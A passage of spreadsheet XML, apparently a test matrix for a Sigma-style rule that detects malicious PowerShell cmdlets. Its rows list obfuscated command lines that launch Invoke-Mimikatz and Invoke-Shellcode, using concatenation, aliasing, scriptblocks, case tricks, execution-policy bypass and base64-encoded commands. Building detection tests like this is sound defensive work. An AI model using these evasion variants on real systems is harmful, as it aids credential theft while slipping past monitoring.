          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E782" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I782" s="43" t="n"/>
      <c r="J782" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C783" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D783" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E783" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I783" s="44" t="n"/>
      <c r="J783" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K783" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="43" t="n"/>
      <c r="B784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C784" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D784" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E784" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I784" s="43" t="n"/>
      <c r="J784" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K784" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="43" t="n"/>
      <c r="B785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C785" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D785" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E785" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I785" s="44" t="n"/>
      <c r="J785" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K785" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="43" t="n"/>
      <c r="B786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C786" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D786" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E786" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I786" s="44" t="n"/>
      <c r="J786" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="43" t="n"/>
      <c r="B787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C787" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D787" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E787" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I787" s="44" t="n"/>
      <c r="J787" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="43" t="n"/>
      <c r="B788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C788" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D788" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E788" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I788" s="44" t="n"/>
      <c r="J788" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="43" t="n"/>
      <c r="B789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C789" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D789" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E789" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I789" s="43" t="n"/>
      <c r="J789" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="43" t="n"/>
      <c r="B790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C790" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D790" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E790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790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I790" s="43" t="n"/>
      <c r="J790" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="43" t="n"/>
      <c r="B791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C791" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D791" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E791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791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I791" s="44" t="n"/>
      <c r="J791" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="43" t="n"/>
      <c r="B792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C792" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D792" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E792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792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I792" s="43" t="n"/>
      <c r="J792" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="43" t="n"/>
      <c r="B793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C793" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D793" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E793" s="4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793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I793" s="43" t="n"/>
      <c r="J793" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="43" t="n"/>
      <c r="B794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C794" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D794" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E794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794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I794" s="43" t="n"/>
      <c r="J794" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K794" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="43" t="n"/>
      <c r="B795" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C795" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D795" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E795" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I795" s="44" t="n"/>
      <c r="J795" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K795" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="43" t="n"/>
      <c r="B796" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C796" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D796" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E796" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I796" s="43" t="n"/>
      <c r="J796" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K796" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="43" t="n"/>
      <c r="B797" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C797" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D797" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E797" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I797" s="44" t="n"/>
      <c r="J797" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K797" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="43" t="n"/>
      <c r="B798" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C798" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D798" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E798" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="44" t="n"/>
      <c r="J798" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K798" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="43" t="n"/>
      <c r="B799" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C799" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D799" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E799" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I799" s="44" t="n"/>
      <c r="J799" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K799" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="43" t="n"/>
      <c r="B800" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C800" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D800" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E800" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I800" s="44" t="n"/>
      <c r="J800" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K800" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="43" t="n"/>
      <c r="B801" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C801" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D801" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E801" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="44" t="n"/>
      <c r="J801" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K801" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="43" t="n"/>
      <c r="B802" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C802" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D802" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E802" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="44" t="n"/>
      <c r="J802" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K802" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="43" t="n"/>
      <c r="B803" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C803" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D803" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E803" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I803" s="44" t="n"/>
      <c r="J803" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K803" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="43" t="n"/>
      <c r="B804" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C804" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D804" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E804" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I804" s="44" t="n"/>
      <c r="J804" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K804" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="43" t="n"/>
      <c r="B805" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C805" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D805" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E805" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="43" t="n"/>
      <c r="J805" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K805" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="43" t="n"/>
      <c r="B806" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C806" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D806" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E806" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="43" t="n"/>
      <c r="J806" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K806" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="43" t="n"/>
      <c r="B807" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C807" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D807" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E807" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="43" t="n"/>
      <c r="J807" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K807" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="43" t="n"/>
      <c r="B808" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C808" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D808" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E808" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="43" t="n"/>
      <c r="J808" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K808" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="43" t="n"/>
      <c r="B809" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C809" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D809" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E809" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I809" s="43" t="n"/>
      <c r="J809" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K809" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="43" t="n"/>
      <c r="B810" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C810" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D810" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E810" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I810" s="43" t="n"/>
      <c r="J810" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K810" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="43" t="n"/>
      <c r="B811" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C811" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D811" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E811" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I811" s="44" t="n"/>
      <c r="J811" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K811" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="43" t="n"/>
      <c r="B812" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C812" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D812" s="44" t="inlineStr">
        <is>
